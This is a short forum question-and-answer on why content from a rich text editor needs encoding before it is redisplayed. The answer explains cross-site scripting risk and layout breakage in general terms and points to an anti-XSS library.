if i have a user entering data into a rich text editor (tiny editor) and submitting data that i am storing into a database and then retrieving to show on other dynamic web pages, why do i need encoding here.
Is the only reason because someone might paste javascript into the rich text editor? is there any other reason ?
Security is the reason.
The most obvious/common reason is Cross-Site-Scripting (XSS). It turns out to be the root cause of the security problems you might witness in your site.
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007.1 Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner.
Additional, as shown in below comments, the layout of your site can also be screwed up.
You need Microsoft Anti-Cross Site Scripting Library
More Resources